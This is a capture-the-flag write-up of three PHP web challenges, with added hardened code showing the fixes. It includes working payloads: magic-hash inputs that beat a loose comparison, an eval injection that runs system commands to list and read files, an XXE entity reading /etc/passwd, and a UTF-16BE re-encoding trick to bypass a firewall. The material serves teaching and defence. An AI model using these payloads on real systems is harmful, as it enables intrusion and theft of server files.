Sudan National CTF 2020 | Web Challenges Writeups
Hello everyone,
Here we are going to discuss the solutions for the web challenges of this CTF, organized by CyberTalents and TrendMicro.
We, as the "ScriptKiddies" team, scored first place with 825 points.
Writeups for the reverse, crypto and forensics challenges: here
Let's start with a challenge that looks easy but took us almost the whole contest to solve.
Name: Web101
Link: http://ec2-18-156-199-115.eu-central-1.compute.amazonaws.com/web101/
Description: May the source be with you.
Points: 50pts
From the challenge description we know it is somehow related to finding the application's source code. We tried almost everything we knew, from directory and parameter brute forcing to header fuzzing, until we discovered that it just needs a request with the header:
accept: text/php
crazy huh? 😂 WHAT a ^&*# developer
Challenge Name: Gallery
Link: http://ec2-18-156-199-115.eu-central-1.compute.amazonaws.com/gallery/
Points: 100pts
It shows us the pictures when we click on each section, but what about section 5?
It looks like a GET parameter.
It needs two different values whose MD5 hashes are the same, and that's impossible.
The mistake in that code is that it uses PHP's loose comparison (==) to compare the hashes and values.
md5('240610708')
= 0e462097431906509019562988736854
md5('QNKCDZO')
= 0e830400451993494058024219903391
When comparing them with "==", PHP treats both hashes as numeric strings (0e... is zero in scientific notation), so the comparison becomes 0 == 0 and succeeds.
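As an added example (our own code, not the challenge source), here is the loose check beside a hardened one in PHP. The two inputs are the magic-hash values quoted above; the function names are ours.

```php
<?php
// Added example, not the challenge's code: PHP's loose comparison (==) on two
// different MD5 digests that both look like "0e<digits>".
$a = md5('240610708'); // 0e462097431906509019562988736854
$b = md5('QNKCDZO');   // 0e830400451993494058024219903391

// Vulnerable pattern: "0e..." == "0e..." is evaluated as 0 == 0.
function vulnerable_check(string $user, string $expected): bool {
    return md5($user) == $expected;
}

// Hardened pattern: hash_equals() compares the bytes (and in constant time),
// so only the exact same digest string is accepted.
function hardened_check(string $user, string $expected): bool {
    return hash_equals($expected, md5($user));
}

var_dump($a == $b);                         // bool(true)  : loose comparison
var_dump($a === $b);                        // bool(false) : strict comparison
var_dump(vulnerable_check('QNKCDZO', $a));  // bool(true)  : wrong preimage accepted
var_dump(hardened_check('QNKCDZO', $a));    // bool(false) : rejected
```

The same trap applies to any comparison of attacker-controlled strings against a digest with `==`; a strict `===` or `hash_equals()` removes it.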
/fl4r3GuN2020.php
It takes /?code=(CODE) and executes it through eval(), but the code passes through addslashes() first, meaning any single or double quotes are escaped and therefore useless.
Our code also ends up inside a double-quoted string: $code = "our_code_here";
For that purpose we are going to execute it with ${eval(CODE)}, but we need code that uses no single or double quotes.
We will use $_GET[1] to take the code from another GET parameter named 1:
${eval($_GET[1])}
/?code=${eval($_GET[1])}&1=system("ls -la");
/?code=${eval($_GET[1])}&1=system("cat 2020_keep_It_53cR3t_H3r3.php");
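As an added example (our own code, not the challenge source), the pattern described above beside a builder that keeps the input as data. The `build_*` function names and the `${marker}` input are ours; the input is deliberately benign.

```php
<?php
// Added example, not the challenge source: why addslashes() does not make
// user input safe inside an eval()'d double-quoted string.

function build_vulnerable(string $input): string {
    // The pattern the writeup describes: quotes get a backslash, but "$" and
    // "{" pass through untouched, so a "${...}" sequence is still interpolated
    // (deprecated syntax since PHP 8.2, but it still executes).
    return '$code = "' . addslashes($input) . '";';
}

function build_hardened(string $input): string {
    // var_export() emits a single-quoted PHP literal with \' and \\ escaped.
    // Single-quoted strings are never interpolated, so the input stays a string.
    // (Not running eval() on request data at all is the real fix.)
    return '$code = ' . var_export($input, true) . ';';
}

// Benign constructed input: "${marker}" is the variable-name-by-expression form.
$marker = 'INTERPOLATED';
$input  = '${marker}';

eval(build_vulnerable($input));
var_dump($code);   // string(12) "INTERPOLATED" : the input was evaluated

eval(build_hardened($input));
var_dump($code);   // string(9) "${marker}" : the input stayed a literal
```

addslashes() only escapes quotes, backslashes and NUL; it is not an eval() sanitizer, and the interpolation in a double-quoted string is what turns the input into code.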
Challenge Name: R3cova
Description: sorry for the inconvenience, our website still under construction
Link: http://ec2-18-156-199-115.eu-central-1.compute.amazonaws.com/revoca/
Points: 100pts
/users.php
/new.php
On this page we can upload an XML file to add a new user; we are given a sample file that looks like:
The most suitable attack for this upload is XXE (XML External Entity) injection.
We can declare an entity to read the content of local files as follows:
<!DOCTYPE x[
<!ENTITY content SYSTEM "file:///etc/passwd">
]>
Then we add it to our sample file and set a field to display the entity's content:
Uploading this malicious XML triggered a firewall alert.
We managed to bypass this firewall by changing the file's encoding, as XML parsers support different encodings such as UTF-8 and UTF-16.
We are going to use big-endian UTF-16, a.k.a. UTF-16BE:
cat sample.xml | iconv -f UTF-8 -t UTF-16BE > malicious.xml
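As an added example (our own code, not the challenge's), a PHP sketch of what this bypass exploits and how a defender closes it: a filter that scans the raw upload bytes for DOCTYPE/ENTITY markers misses the UTF-16BE form, while a DOMDocument loader that rejects any DOCTYPE after parsing catches it regardless of byte encoding. The sample document, its encoding="UTF-16" declaration and the function names are our assumptions.

```php
<?php
// Added example, not the challenge's code. The writeup's WAF matched markers in
// the raw bytes, so re-encoding the file as UTF-16BE hid them while libxml
// still decoded and parsed it. The robust check runs on the parsed document.

// Constructed sample in the shape the writeup describes (name/email/group/intro).
// The encoding="UTF-16" declaration matches the bytes produced below.
$xml_utf8 = '<?xml version="1.0" encoding="UTF-16"?>' . "\n"
    . '<!DOCTYPE x [ <!ENTITY content SYSTEM "file:///etc/passwd"> ]>' . "\n"
    . '<user><name>&content;</name><email>a@b.c</email>'
    . '<group>user</group><intro>hi</intro></user>';
$upload = mb_convert_encoding($xml_utf8, 'UTF-16BE', 'UTF-8');

// Naive byte-level filter: the kind of check the encoding trick defeats.
function naive_waf_blocks(string $bytes): bool {
    return stripos($bytes, '<!ENTITY') !== false
        || stripos($bytes, '<!DOCTYPE') !== false;
}

// Hardened loader: no LIBXML_NOENT (no entity substitution), LIBXML_NONET
// (no network fetches) and any DOCTYPE is rejected after parsing, whatever
// encoding the upload used. (PHP 8 also stops loading external entities by
// default; earlier versions needed libxml_disable_entity_loader(true).)
function load_user_xml(string $bytes): ?DOMDocument {
    $prev = libxml_use_internal_errors(true);  // collect errors, no warnings
    $dom = new DOMDocument();
    $ok = $dom->loadXML($bytes, LIBXML_NONET);
    libxml_clear_errors();
    libxml_use_internal_errors($prev);
    if (!$ok) {
        return null;                            // malformed input
    }
    if ($dom->doctype !== null) {
        return null;                            // a user upload never needs a DTD
    }
    return $dom;
}

var_dump(naive_waf_blocks($xml_utf8));      // bool(true)  : UTF-8 form is caught
var_dump(naive_waf_blocks($upload));        // bool(false) : UTF-16BE form slips through
var_dump(load_user_xml($upload) === null);  // bool(true)  : parser-level check rejects it
```

The lesson is to make the policy decision (no DTD, no entity expansion, no network) at the parser, after decoding, rather than in a byte-matching layer in front of it.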
Cool, it seems to work, but there is a limit: only the first 20 characters of the file are shown. We could bypass that using blind XXE techniques,
but the easy way was to add an intro tag to the XML file: <intro>UNLIMITED</intro>
We discovered this field from the users.php page, as it shows four elements: name, email, group and intro.
Cool, it's working; we were able to find the flag in the root directory, "/flag.txt".
and that’s it.
Thanks.
References:
"Magic Hashes", https://github.com/ryanking13/ctf-cheatsheet/blob/master/Cryptography/Useful_Hashes.md
"PHP: Strings - Manual", https://www.php.net/manual/en/language.types.string.php